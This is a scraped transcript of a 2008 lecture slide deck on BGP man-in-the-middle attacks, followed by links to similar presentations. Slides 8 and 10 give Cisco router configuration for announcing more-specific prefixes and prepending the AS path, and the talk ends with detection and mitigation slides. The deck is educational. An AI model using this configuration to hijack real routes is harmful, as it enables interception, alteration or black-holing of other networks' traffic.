Presentation is loading. Please wait.

Presentation is loading. Please wait.

BGP Man in the Middle Attack Jason Froehlich December 10, 2008.

Published byPercival James Modified over 9 years ago

Similar presentations

Presentation on theme: "BGP Man in the Middle Attack Jason Froehlich December 10, 2008."— Presentation transcript:

1 BGP Man in the Middle Attack Jason Froehlich December 10, 2008

2 What is BGP? Routing for whole Internet Autonomous Systems (AS)‏ Classless Interdomain Routing (CIDR)‏  190.100.0.0/16190.100.0.0, 255.255.0.0

3 How BGP Works AS Border Router - “BGP Speaker”  Advertise own routes, redistribute others Update Messages  “AS_PATH” field Path Selection  Most “Specific” Network  190.100.0.0/17 over 190.100.0.0/16

4 The Man in the Middle Attack Requirements:  Redirect all traffic to Attacker  Forward traffic onto Target Relies on trust built into BGP

5 Attack Threats Confidentiality  Capture all packets Integrity  Modify packets before delivery Availability  Black Hole  Filtering selected packets

6 Implementation 190.100.0.0/16 (AS100) is Target AS900 is Attacker

7 Implementation – Step 1 Advertise New Routes More specific  190.100.0.0/17, 190.100.128.0/17

8 Implementation – Step 1 router bgp 900 network 190.100.0.0 mask 255.255.128.0 network 190.100.128.0 mask 255.255.128.0... neighbor remote-as 600 neighbor remote-as 700 neighbor remote-as 800 no auto-summary

9 Implementation – Step 2 Create Route Back to Target Modify “AS_PATH” field of advertisement  Add each AS in route to target

10 Implementation – Step 2 ip prefix-list victim permit 190.100.0.0/16 route-map mitm permit 10 match ip address prefix-list victim set as-path prepend 600 300 100 ip route 190.100.0.0 255.255.128.0 ip route 190.100.128.0 255.255.128.0

11 Attack Limitations Access to BGP Router  No script kiddies, but pool still large Half of the Conversation  Only sees Inbound traffic  Resolve: 2 nd BGP MITM, Other MITM (DNS) ‏ Incomplete Route Distribution  AS's in Return Path

12 Attack Limitations cont. Packet Route Visible  Traceroute  Resolve: TTL Modification BGP Updates Visible  Alert a perceptive Administrator Encrypted Traffic  Cannot decrypt payload

13 Mitigating the Attack - Prevention Filtering  Must be done by every ISP Internet Routing Registry  Overhead  Poor Database Maintenance / Security

14 Mitigating the Attack - Detection Monitor for BGP Updates BGPmon.net

15 Mitigating the Attack - Response Counter-Attack  Advertise even more specific networks ISP Disconnect Attacker  May take hours to days  Youtube.com – February 2008

16 Mitigating the Attack – Securing BGP S-BGP  2 Certificates – IP address, AS Secure Origin BGP  Topologies Interdomain Route Validation  Out of band verification

17 Conclusion BGP Man in the Middle Powerful Attack Easy to Implement Difficult to Mitigate

Download ppt "BGP Man in the Middle Attack Jason Froehlich December 10, 2008."

Similar presentations

An Operational Perspective on BGP Security Geoff Huston February 2005.

An Operational Perspective on BGP Security Geoff Huston February 2005.
RIP V2 W.lilakiatsakun.  RFC 2453 (obsoletes –RFC 1723 /1388)  Extension of RIP v1 (Classful routing protocol)  Classless routing protocol –VLSM is.

RIP V2 W.lilakiatsakun.  RFC 2453 (obsoletes –RFC 1723 /1388)  Extension of RIP v1 (Classful routing protocol)  Classless routing protocol –VLSM is.
© 2008 Cisco Systems, Inc. All rights reserved.Cisco ConfidentialPresentation_ID 1 Chapter 8: EIGRP Advanced Configurations and Troubleshooting Scaling.

© 2008 Cisco Systems, Inc. All rights reserved.Cisco ConfidentialPresentation_ID 1 Chapter 8: EIGRP Advanced Configurations and Troubleshooting Scaling.
1 Chapter 2: Networking Protocol Design Designs That Include TCP/IP Essential TCP/IP Design Concepts TCP/IP Data Protection TCP/IP Optimization.

1 Chapter 2: Networking Protocol Design Designs That Include TCP/IP Essential TCP/IP Design Concepts TCP/IP Data Protection TCP/IP Optimization.
1 Copyright  1999, Cisco Systems, Inc. Module10.ppt10/7/1999 8:27 AM BGP — Border Gateway Protocol Routing Protocol used between AS’s Currently Version.

1 Copyright  1999, Cisco Systems, Inc. Module10.ppt10/7/1999 8:27 AM BGP — Border Gateway Protocol Routing Protocol used between AS’s Currently Version.
A Quick and Dirty Guide to BGP attacks Or “How to 0wn the Backbone in your Spare Time”

A Quick and Dirty Guide to BGP attacks Or “How to 0wn the Backbone in your Spare Time”
Network Layer: Internet-Wide Routing & BGP Dina Katabi & Sam Madden.

Network Layer: Internet-Wide Routing & BGP Dina Katabi & Sam Madden.
Availability Centric Routing (ACR) Robust Interdomain Routing Without BGP Security July 25 th, 2006.

Availability Centric Routing (ACR) Robust Interdomain Routing Without BGP Security July 25 th, 2006.
1 Interdomain Routing Protocols. 2 Autonomous Systems An autonomous system (AS) is a region of the Internet that is administered by a single entity and.

1 Interdomain Routing Protocols. 2 Autonomous Systems An autonomous system (AS) is a region of the Internet that is administered by a single entity and.
An Operational Perspective on BGP Security Geoff Huston GROW WG IETF 63 August 2005.

An Operational Perspective on BGP Security Geoff Huston GROW WG IETF 63 August 2005.
1 Network Architecture and Design Routing: Exterior Gateway Protocols and Autonomous Systems Border Gateway Protocol (BGP) Reference D. E. Comer, Internetworking.

1 Network Architecture and Design Routing: Exterior Gateway Protocols and Autonomous Systems Border Gateway Protocol (BGP) Reference D. E. Comer, Internetworking.
Interdomain Routing Security COS 461: Computer Networks Michael Schapira.

Interdomain Routing Security COS 461: Computer Networks Michael Schapira.
Practical and Configuration issues of BGP and Policy routing Cameron Harvey Simon Fraser University.

Practical and Configuration issues of BGP and Policy routing Cameron Harvey Simon Fraser University.
1 BGP Security -- Zhen Wu. 2 Schedule Tuesday –BGP Background – Detection of Invalid Routing Announcement in the Internet –Open Discussions Thursday.

1 BGP Security -- Zhen Wu. 2 Schedule Tuesday –BGP Background –" Detection of Invalid Routing Announcement in the Internet" –Open Discussions Thursday.
By Rod Lykins.  Background  Benefits  Security Advantages ◦ Address Space ◦ IPSec  Remaining Security Issues  Conclusion.

By Rod Lykins.  Background  Benefits  Security Advantages ◦ Address Space ◦ IPSec  Remaining Security Issues  Conclusion.
SAVE: Source Address Validity Enforcement Protocol Jun Li, Jelena Mirković, Mengqiu Wang, Peter Reiher and Lixia Zhang UCLA Computer Science Dept 10/04/2001.

SAVE: Source Address Validity Enforcement Protocol Jun Li, Jelena Mirković, Mengqiu Wang, Peter Reiher and Lixia Zhang UCLA Computer Science Dept 10/04/2001.
Interdomain Routing Security Jennifer Rexford Advanced Computer Networks Tuesdays/Thursdays.

Interdomain Routing Security Jennifer Rexford Advanced Computer Networks Tuesdays/Thursdays.
Ion Stoica October 2, 2002 (* this presentation is based on Lakshmi Subramanian’s slides) EE 122: Inter-domain routing – Border Gateway Protocol (BGP)

Ion Stoica October 2, 2002 (* this presentation is based on Lakshmi Subramanian’s slides) EE 122: Inter-domain routing – Border Gateway Protocol (BGP)
04/05/20011 ecs298k: Routing in General... lecture #2 Dr. S. Felix Wu Computer Science Department University of California, Davis

04/05/20011 ecs298k: Routing in General... lecture #2 Dr. S. Felix Wu Computer Science Department University of California, Davis
© 2009 Cisco Systems, Inc. All rights reserved. ROUTE v1.0—4-1 Implement an IPv4-Based Redistribution Solution Assessing Network Routing Performance and.

© 2009 Cisco Systems, Inc. All rights reserved. ROUTE v1.0—4-1 Implement an IPv4-Based Redistribution Solution Assessing Network Routing Performance and.

Similar presentations

Ads by Google